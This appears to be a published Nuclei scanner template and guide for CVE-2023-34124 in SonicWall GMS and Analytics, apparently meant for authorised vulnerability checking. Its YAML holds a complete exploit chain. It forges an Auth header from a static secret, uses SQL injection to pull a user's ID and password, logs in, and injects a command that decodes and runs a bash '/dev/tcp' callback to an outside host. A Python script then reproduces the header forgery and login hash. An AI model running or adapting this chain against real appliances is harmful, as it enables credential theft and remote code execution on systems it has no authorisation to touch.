SonicWall GMS and Analytics Web Services - Shell Injection
ID: CVE-2023-34124
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive
Description
The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS 9.3.2-SP1 and earlier and Analytics 2.5.0.4-R7 and earlier. The template below chains that bypass with the further steps visible in its requests: the web-service Auth header is forged with HMAC-SHA1 over a static secret, which lets an unauthenticated caller push a SQL injection through the tenant parameter of /ws/msw/tenant/ and read an active user's ID and stored password value; those values are used to log into the appliance management interface, and a command injection in the file_system search action then runs a bash callback to the interactsh server.
YAML Source
id: CVE-2023-34124

info:
  name: SonicWall GMS and Analytics Web Services - Shell Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34124
    cwe-id: CWE-287,CWE-305
    epss-score: 0.03433
    epss-percentile: 0.91476
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: sonicwall
    product: analytics
    shodan-query: http.favicon.hash:-1381126564
    fofa-query: icon_hash=-1381126564
  tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive

variables:
  callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
  query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}

      - |
        GET /appliance/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0

      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<title>SonicWall Universal Management Appliance</title>"
          - "<title>SonicWall Universal Management Host</title>"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: json
        part: body
        internal: true
        name: alias
        group: 1
        json:
          - '.alias'

      - type: regex
        part: body
        internal: true
        name: servertoken
        group: 1
        regex:
          - "getPwdHash.*,'([0-9]+)'"
# digest: 4b0a00483046022100f924254dee70f4c9507b01ac1ef4e94911b8a694b6fb7daa07a3f1dcb0bbbb060221009132d652a5f53242d9864478eaa301c02195fd754fe067c7527fedf7c6101f3d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
Run the template with Nuclei against the target, replacing URL with the base URL of the GMS or Analytics web interface. This template is tagged intrusive: its last request executes a bash command on the appliance that opens a TCP connection to your interactsh host, so run it only against systems you are authorised to test, and make sure the target can resolve and reach that host. A finding is reported only when both matchers fire: the post-login response carries the SonicWall Universal Management page title and an interactsh DNS interaction is received for the callback. Nuclei uses the public interactsh service unless you point it at your own with -iserver.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-34124.yaml"
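The script below is an added example, not part of the Nuclei template or of SonicWall's software. It reproduces offline the two credential computations the template delegates to Nuclei helper functions, so the bypass can be seen directly: the forged Auth header (base64 of the raw HMAC-SHA1 of the tenant value under the static secret) and the clientHash for the appliance login (md5 of servertoken concatenated with the password). It also mirrors the template's alias split and servertoken extractor. The function names, the sample alias and the login-page fragment are constructed for illustration; the secret and the injected query are copied from the template's variables.

```python
"""
Offline reproduction of the credential computations in the CVE-2023-34124 template.
Nothing here contacts a target; it only shows why the static secret defeats
authentication on /ws/msw/tenant/ and how the recovered alias feeds the login.
"""
import base64
import hashlib
import hmac
import json
import re
from typing import Optional, Tuple

# Copied from the template's variables section.
SECRET = "?~!@#$%^^()"
QUERY = ("' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', "
         "(select concat(id, ':', password) from sgmsdb.users where active = '1' "
         "order by issuperadmin desc limit 1 offset 0),'', '', '")


def hmac_sha1_hex(data: str, secret: str) -> str:
    """Equivalent of Nuclei's hmac('sha1', data, secret): lowercase hex digest."""
    return hmac.new(secret.encode(), data.encode(), hashlib.sha1).hexdigest()


def forge_auth_header(tenant_value: str, secret: str = SECRET) -> str:
    """Auth header value: {"user": "system", "hash": base64(hex_decode(hmac))}.

    Because the secret is fixed, any caller can sign any tenant value, including
    the SQL-injection payload in QUERY.
    """
    raw = bytes.fromhex(hmac_sha1_hex(tenant_value, secret))
    return json.dumps({"user": "system", "hash": base64.b64encode(raw).decode()})


def split_alias(alias: str) -> Tuple[str, str]:
    """Mirror the template's replace_regex calls on the extracted 'id:password' alias.

    '^.*:' is greedy, so a colon inside the password is treated exactly as the
    template treats it: everything up to the last colon is the user.
    """
    user = re.sub(r":.*$", "", alias)      # applianceUser
    password = re.sub(r"^.*:", "", alias)  # password
    return user, password


def client_hash(servertoken: str, password: str) -> str:
    """clientHash for /appliance/applianceMainPage: md5(concat(servertoken, password))."""
    return hashlib.md5((servertoken + password).encode()).hexdigest()


def extract_servertoken(login_page: str) -> Optional[str]:
    """Same regex as the template's servertoken extractor."""
    m = re.search(r"getPwdHash.*,'([0-9]+)'", login_page)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed sample data (hypothetical): an alias as the injected query would
    # return it, and a fragment shaped like the /appliance/login page.
    sample_alias = "admin:5f4dcc3b5aa765d61d8327deb882cf99"
    sample_login = "<script>getPwdHash(document.form,'8675309');</script>"

    print("Auth:", forge_auth_header(QUERY))
    user, pw = split_alias(sample_alias)
    token = extract_servertoken(sample_login)
    print("applianceUser=%s servertoken=%s clientHash=%s"
          % (user, token, client_hash(token or "", pw)))
```

The Auth header forged for QUERY is byte-for-byte what the template sends in its first request; the only secret material involved is the constant baked into the template, which is the defect CWE-287/CWE-305 describe.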